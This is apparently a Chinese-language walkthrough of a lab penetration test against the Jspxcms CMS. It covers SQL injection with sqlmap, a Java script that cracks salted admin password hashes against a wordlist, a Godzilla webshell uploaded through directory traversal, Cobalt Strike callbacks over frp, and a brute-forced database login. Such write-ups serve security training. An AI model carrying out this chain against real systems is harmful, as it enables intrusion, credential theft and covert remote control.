6.Jspxcms-SQL注入
首页发现可以注册用户和进行登录。首先搜索历史漏洞,看看有没有getshell的地方。
发现先知的大佬做过找个版本的代码审计。参考链接:https://xz.aliyun.com/t/10891?page=1#toc-7。发现可以通过文件上传进行gethshell。
在之前的tomexam的数据库中,发现存在jspxcms,试试查找一下管理员的用户和信息。
使用sqlmap进行查找表、用户和吗密码。
成功发现了用户名和加密的密码。密码推断是明文密码+salt然后再进行md5加密。
7.编写解密脚本
通过其源码,分析其加密方式,然后编写解密脚本。
package com.jspxcms.core; import com.jspxcms.common.security.SHA1CredentialsDigest; import com.jspxcms.common.util.Encodes; import java.io.File; import java.io.FileReader; import java.io.FileWriter; import java.io.PrintWriter; import java.util.Scanner; public class Testmain { public static void main(String[] args)throws Exception { byte[] salt = Encodes.decodeHex("9b2b38ad7cb62fd9"); SHA1CredentialsDigest test = new SHA1CredentialsDigest(); String fileName = "D:\\csdnpass.txt"; String fileName2 = "D:\\hashpassword2.txt"; try (Scanner sc = new Scanner(new FileReader(fileName))) { while (sc.hasNextLine()) { String line = sc.nextLine(); String encPass = test.digest(line, salt); File f = new File(fileName2); FileWriter fw = new FileWriter(f, true); PrintWriter pw = new PrintWriter(fw); pw.println(line + " " + encPass); pw.close(); } } } }
8.登录jspxcms后台getshell
使用管理员用户和解密出来的密码,成功进入管理员后台。
8.使用哥斯拉生成一个木马,然后使用jar,打包成为war包。
9.编写目录穿越脚本
根据先知社区的大佬提出的方法,编写目录穿越脚本。
成功进行上传。
10.获取webshell
使用哥斯拉连接webshell,成功执行命令。
内网渗透:
1.frp反向代理上线CS
首先配置内网cobalt strike内网上线
在kali启动cs服务端,
查看其端口
配置frp的frps.ini信息。
2.CS上线
cs生成监听。
然后上传.exe文件进行上线。
成功上线。
3.内网信息收集
使用shell iponfig 收集信息。
根据搭建的拓扑环境,然后测试一下与其他域内主机的连通性。
查看计算机名。
使用net view 查找域内其它主机,发现不能找到其他主机。
4.开启代理进行端口扫描
查看server2012的IP地址。
5.域内主机端口扫描
发现存在1433——Mysql的端口,尝试进行弱口令的暴力破解。
最好成功爆破出账号和密码.
